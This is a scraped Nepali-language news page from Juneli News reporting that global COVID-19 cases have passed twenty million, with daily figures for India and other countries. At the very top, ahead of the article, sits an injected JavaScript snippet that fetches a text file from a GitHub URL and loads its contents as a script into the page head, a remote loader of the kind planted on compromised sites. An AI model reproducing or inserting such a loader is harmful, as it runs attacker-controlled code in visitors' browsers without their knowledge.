;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); विश्वमा कोरोना संक्रमितको संख्या दुई करोड नाघ्यो : एक करोड २८ लाख मानिस उपचारपछि निको भए – जुनेली न्युज
आइतवार, साउन ६, २०८२
  • होमपेज
  • विश्वमा कोरोना संक्रमितको संख्या दुई करोड नाघ्यो : एक करोड २८ लाख मानिस उपचारपछि निको भए
अन्तर्राष्ट्रिय

विश्वमा कोरोना संक्रमितको संख्या दुई करोड नाघ्यो : एक करोड २८ लाख मानिस उपचारपछि निको भए

भारतमा थपिए ६२ हजार

साउन २६,

काठमाडौं । विश्वभर कोरोना संक्रमितको संख्या २ करोड नाघेको छ। पछिल्लो २४ घण्टामा २ लाख १२ हजारभन्दा बढी संक्रमित थपिएसँगै विश्वमा संक्रमितको संख्या २ करोड ९ हजार पुगेको हो।

पछिल्लो २४ घण्टामा भारतमा सबैभन्दा बढी ६२ हजार संक्रमित थपिएका छन्। लगातार ठूलो संख्यामा संक्रमित थपिइरहेको भारतमा कुल संक्रमितको संख्या २२ लाख १४ हजार पुगेको छ। त्यहाँ पछिल्लो २४ घण्टामा १ हजार १३ जनाको मृत्यु भएको छ।

योसहित भारतमा कुल मृतकको संख्या ४४ हजार ४ सय ६६ पुगेको छ। यस्तै अमेरिकामा ४७ हजार ८१४, ब्राजिलमा २२ हजार २१३, रसियामा ५ हजार, दक्षिण अफ्रिकामा ६ हजार ६७१ तथा मेक्सिकोमा ६ हजार ४९५ संक्रमित थपिएका छन्। विश्वभर कोरोना भाइरसको संक्रमणबाट मृत्यु हुनेको संख्या ७ लाख ३३ हजार ३६० पुगेको छ। यस्तै एक करोड २८ लाख मानिस उपचारपछि निको भएर घर फर्किएका छन्।file Photo

फेसबुक प्रतिक्रियाहरु